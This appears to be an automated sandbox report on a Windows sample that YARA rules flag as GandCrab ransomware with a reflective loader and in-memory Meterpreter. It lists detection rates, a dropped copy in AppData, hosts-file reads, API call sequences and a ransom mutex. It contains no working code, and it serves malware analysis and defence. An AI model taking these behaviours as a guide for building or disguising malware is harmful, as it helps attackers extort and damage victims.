Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: Process Memory Space: mqsmvj.exe PID: 5964, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: mqsmvj.exe PID: 5524, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: mqsmvj.exe PID: 4940, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F141C20	0_2_0F141C20
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F141020	0_2_0F141020
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F148520	0_2_0F148520
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F581C20	3_2_0F581C20
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F581020	3_2_0F581020
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F588520	3_2_0F588520
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F581C20	11_2_0F581C20
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F588520	11_2_0F588520
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F581020	11_2_0F581020

Source: IJr8RvvhZ3.exe	Virustotal: Detection: 87%
Source: IJr8RvvhZ3.exe	Metadefender: Detection: 86%
Source: IJr8RvvhZ3.exe	ReversingLabs: Detection: 96%

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

File read: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Jump to behavior

Source: IJr8RvvhZ3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IJr8RvvhZ3.exe "C:\Users\user\Desktop\IJr8RvvhZ3.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@21/1@15/0

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Code function: 0_2_0F147490 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,

0_2_0F147490

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Code function: 0_2_0F147B70 wsprintfW,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateToolhelp32Snapshot,VirtualFree,Process32FirstW,lstrcmpiW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,Process32NextW,GetLastError,lstrlenW,VirtualFree,VirtualFree,FindCloseChangeNotification,VirtualFree,

0_2_0F147B70

Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=63b5ce1c617217a5

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: IJr8RvvhZ3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Data Obfuscation

Yara detected ReflectiveLoader

Source: Yara match	File source: IJr8RvvhZ3.exe, type: SAMPLE
Source: Yara match	File source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
